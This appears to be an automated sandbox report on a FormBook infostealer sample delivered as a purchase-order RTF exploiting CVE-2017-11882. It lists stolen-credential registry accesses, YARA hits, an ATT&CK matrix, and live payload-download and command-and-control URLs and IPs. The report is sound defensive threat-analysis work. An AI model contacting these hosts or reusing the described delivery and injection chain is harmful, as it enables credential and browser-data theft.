            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E0337A sqlite3_value_frombind,8_2_61E0337A
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E03463 sqlite3_bind_parameter_name,8_2_61E03463
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E03451 sqlite3_bind_parameter_count,8_2_61E03451
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E14411 sqlite3_bind_parameter_index,8_2_61E14411
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E257EA sqlite3_bind_double,sqlite3_mutex_leave,8_2_61E257EA
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E257C3 sqlite3_bind_text16,8_2_61E257C3
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E25756 sqlite3_bind_text64,8_2_61E25756
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E2572F sqlite3_bind_text,8_2_61E2572F
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E1073D sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,8_2_61E1073D
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E256E8 sqlite3_bind_blob64,8_2_61E256E8
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E256C1 sqlite3_mutex_leave,sqlite3_bind_blob,8_2_61E256C1
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E259F3 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,8_2_61E259F3
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E25986 sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E25986
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E25909 sqlite3_bind_pointer,sqlite3_mutex_leave,8_2_61E25909
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E258D8 sqlite3_bind_null,sqlite3_mutex_leave,8_2_61E258D8
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E258B2 sqlite3_bind_int,sqlite3_bind_int64,8_2_61E258B2
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E1088D sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,8_2_61E1088D
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E25863 sqlite3_bind_int64,sqlite3_mutex_leave,8_2_61E25863
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E25ADA sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E25ADA

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts33
            Exploitation for Client Execution            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            File and Directory Discovery            		Remote Desktop Protocol1
            Browser Session Hijacking            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager16
            System Information Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
            Obfuscated Files or Information            		NTDS1
            Query Registry            		Distributed Component Object Model1
            Email Collection            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Install Root Certificate            		LSA Secrets21
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Software Packing            		Cached Domain Credentials2
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSync41
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Masquerading            		/etc/passwd and /etc/shadow1
            Remote System Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Modify Registry            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
            Virtualization/Sandbox Evasion            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
            Process Injection            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435172 Sample: MOQ010524Purchase order.doc Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 47 www.exclaimer342200213.net 2->47 49 exclaimer342200213.net 2->49 75 Snort IDS alert for network traffic 2->75 77 Multi AV Scanner detection for domain / URL 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 13 other signatures 2->81 12 WINWORD.EXE 336 14 2->12         started        signatures3 process4 process5 14 EQNEDT32.EXE 11 12->14         started        19 EQNEDT32.EXE 12->19         started        dnsIp6 57 universalmovies.top 104.21.74.191, 443, 49163 CLOUDFLARENETUS United States 14->57 41 C:\Users\user\AppData\Roaming\op55336.scr, PE32 14->41 dropped 43 C:\Users\user\AppData\Local\...\opp[1].scr, PE32 14->43 dropped 61 Installs new ROOT certificates 14->61 63 Office equation editor establishes network connection 14->63 65 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->65 21 op55336.scr 2 14->21         started        file7 signatures8 process9 signatures10 87 Machine Learning detection for dropped file 21->87 89 Injects a PE file into a foreign processes 21->89 24 op55336.scr 21->24         started        process11 signatures12 91 Maps a DLL or memory area into another process 24->91 27 eDTvjJMLUGCaWhgZ.exe 24->27 injected process13 signatures14 93 Maps a DLL or memory area into another process 27->93 95 Found direct / indirect Syscall (likely to bypass EDR) 27->95 30 dfrgui.exe 1 20 27->30         started        process15 dnsIp16 59 www.sqlite.org 45.33.6.223, 49165, 80 LINODE-APLinodeLLCUS United States 30->59 45 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 30->45 dropped 67 Tries to steal Mail credentials (via file / registry access) 30->67 69 Tries to harvest and steal browser information (history, passwords, etc) 30->69 71 Maps a DLL or memory area into another process 30->71 73 Queues an APC in another process (thread injection) 30->73 35 eDTvjJMLUGCaWhgZ.exe 30->35 injected 39 firefox.exe 30->39         started        file17 signatures18 process19 dnsIp20 51 www.99b6q.xyz 35->51 53 www.touchclean.top 67.223.117.189, 49186, 49187, 49188 VIMRO-AS15189US United States 35->53 55 17 other IPs or domains 35->55 83 Found direct / indirect Syscall (likely to bypass EDR) 35->83 signatures21 85 Performs DNS queries to domains with low reputation 51->85

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            MOQ010524Purchase order.doc42%VirustotalBrowse
            MOQ010524Purchase order.doc37%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\op55336.scr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.xn--matfrmn-jxa4m.se0%VirustotalBrowse
            jnkinteractive.co.kr0%VirustotalBrowse
            exclaimer342200213.net1%VirustotalBrowse
            www.kinkynerdspro.blog4%VirustotalBrowse
            www.terelprime.com4%VirustotalBrowse
            universalmovies.top24%VirustotalBrowse
            aceautocorp.com1%VirustotalBrowse
            www.touchclean.top1%VirustotalBrowse
            mrart.co.kr0%VirustotalBrowse
            www.chrisdomond.com1%VirustotalBrowse
            www.besthomeincome24.com0%VirustotalBrowse
            www.exclaimer342200213.net3%VirustotalBrowse
            www.mrart.co.kr0%VirustotalBrowse
            www.ibistradingco.com1%VirustotalBrowse
            www.aceautocorp.com1%VirustotalBrowse
            www.primeplay88.org4%VirustotalBrowse
            www.jnkinteractive.co.kr0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://ocsp.entrust.net030%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://www.riveramayahousing.com/ufuh/0%Avira URL Cloudsafe
            http://www.riveramayahousing.com0%Avira URL Cloudsafe
            http://www.kinkynerdspro.blog/ufuh/0%Avira URL Cloudsafe
            http://www.touchclean.top/ufuh/?pl=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            http://www.riveramayahousing.com/ufuh/?pl=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            https://universalmovies.top/opp.scr100%Avira URL Cloudphishing
            http://www.jnkinteractive.co.kr/ufuh/0%Avira URL Cloudsafe
            http://www.mrart.co.kr/ufuh/0%Avira URL Cloudsafe
            https://universalmovies.top/opp.scrhhC:100%Avira URL Cloudphishing
            https://universalmovies.top/opp.scrj100%Avira URL Cloudphishing
            http://www.jnkinteractive.co.kr/ufuh/0%VirustotalBrowse
            http://www.ibistradingco.com/ufuh/0%Avira URL Cloudsafe
            http://www.mrart.co.kr/ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
            http://www.terelprime.com/ufuh/?pl=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&5h1t=6H6PKFvXjtI4u8k100%Avira URL Cloudmalware
            http://www.xn--matfrmn-jxa4m.se/ufuh/0%Avira URL Cloudsafe
            http://www.kinkynerdspro.blog/ufuh/2%VirustotalBrowse
            http://www.mrart.co.kr/ufuh/1%VirustotalBrowse
            http://mrart.co.kr/ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR0%Avira URL Cloudsafe
            http://www.ibistradingco.com/ufuh/2%VirustotalBrowse
            http://www.searchvity.com/?dn=3%VirustotalBrowse
            http://www.primeplay88.org/ufuh/0%Avira URL Cloudsafe
            http://www.aceautocorp.com/ufuh/0%Avira URL Cloudsafe
            http://aceautocorp.com/ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto0%Avira URL Cloudsafe
            http://www.primeplay88.org/ufuh/?pl=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            https://www.ibistradingco.com/ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIW0%Avira URL Cloudsafe
            http://www.jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            http://www.primeplay88.org/ufuh/4%VirustotalBrowse
            http://www.kinkynerdspro.blog/ufuh/?pl=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            http://www.ibistradingco.com/ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            http://www.aceautocorp.com/ufuh/1%VirustotalBrowse
            https://universalmovies.top/100%Avira URL Cloudphishing
            http://www.touchclean.top/ufuh/0%Avira URL Cloudsafe
            http://www.searchvity.com/0%Avira URL Cloudsafe
            http://jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh0%Avira URL Cloudsafe
            http://www.aceautocorp.com/ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/ufuh/?pl=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&5h1t=6H6PKFvXjtI4u8k0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/ufuh/0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.riveramayahousing.com
            		208.91.197.13
            		truetrue
              		unknown
              www.xn--matfrmn-jxa4m.se
              		194.9.94.86
              		truetrueunknown
              jnkinteractive.co.kr
              		183.111.183.31
              		truetrueunknown
              exclaimer342200213.net
              		84.33.215.91
              		truefalseunknown
              parkingpage.namecheap.com
              		91.195.240.19
              		truefalse
                		high
                www.kinkynerdspro.blog
                		94.23.162.163
                		truetrueunknown
                www.terelprime.com
                		66.96.161.166
                		truetrueunknown
                www.ibistradingco.com.cdn.hstgr.net
                		154.41.250.58
                		truetrue
                  		unknown
                  universalmovies.top
                  		104.21.74.191
                  		truetrueunknown
                  www.touchclean.top
                  		67.223.117.189
                  		truetrueunknown
                  mrart.co.kr
                  		183.111.183.31
                  		truetrueunknown
                  aceautocorp.com
                  		198.12.241.35
                  		truetrueunknown
                  www.sqlite.org
                  		45.33.6.223
                  		truefalse
                    		high
                    www.chrisdomond.com
                    		unknown
                    		unknownfalseunknown
                    www.99b6q.xyz
                    		unknown
                    		unknowntrue
                      		unknown
                      www.exclaimer342200213.net
                      		unknown
                      		unknownfalseunknown
                      www.besthomeincome24.com
                      		unknown
                      		unknownfalseunknown
                      www.mrart.co.kr
                      		unknown
                      		unknownfalseunknown
                      www.ibistradingco.com
                      		unknown
                      		unknownfalseunknown
                      www.jnkinteractive.co.kr
                      		unknown
                      		unknownfalseunknown
                      www.aceautocorp.com
                      		unknown
                      		unknownfalseunknown
                      www.primeplay88.org
                      		unknown
                      		unknownfalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.riveramayahousing.com/ufuh/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.kinkynerdspro.blog/ufuh/true
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.touchclean.top/ufuh/?pl=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&5h1t=6H6PKFvXjtI4u8ktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.riveramayahousing.com/ufuh/?pl=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&5h1t=6H6PKFvXjtI4u8ktrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://universalmovies.top/opp.scrtrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://www.jnkinteractive.co.kr/ufuh/true
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mrart.co.kr/ufuh/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.ibistradingco.com/ufuh/true
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.mrart.co.kr/ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&5h1t=6H6PKFvXjtI4u8ktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.terelprime.com/ufuh/?pl=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&5h1t=6H6PKFvXjtI4u8ktrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.xn--matfrmn-jxa4m.se/ufuh/true
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.primeplay88.org/ufuh/true
                      • 4%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.aceautocorp.com/ufuh/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.primeplay88.org/ufuh/?pl=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&5h1t=6H6PKFvXjtI4u8ktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&5h1t=6H6PKFvXjtI4u8ktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.kinkynerdspro.blog/ufuh/?pl=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&5h1t=6H6PKFvXjtI4u8ktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.ibistradingco.com/ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&5h1t=6H6PKFvXjtI4u8ktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.touchclean.top/ufuh/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zipfalse
                        		high
                        http://www.aceautocorp.com/ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&5h1t=6H6PKFvXjtI4u8ktrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.xn--matfrmn-jxa4m.se/ufuh/?pl=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&5h1t=6H6PKFvXjtI4u8ktrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabdfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                          		high
                          http://www.riveramayahousing.comeDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847699564.0000000004E39000.00000040.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
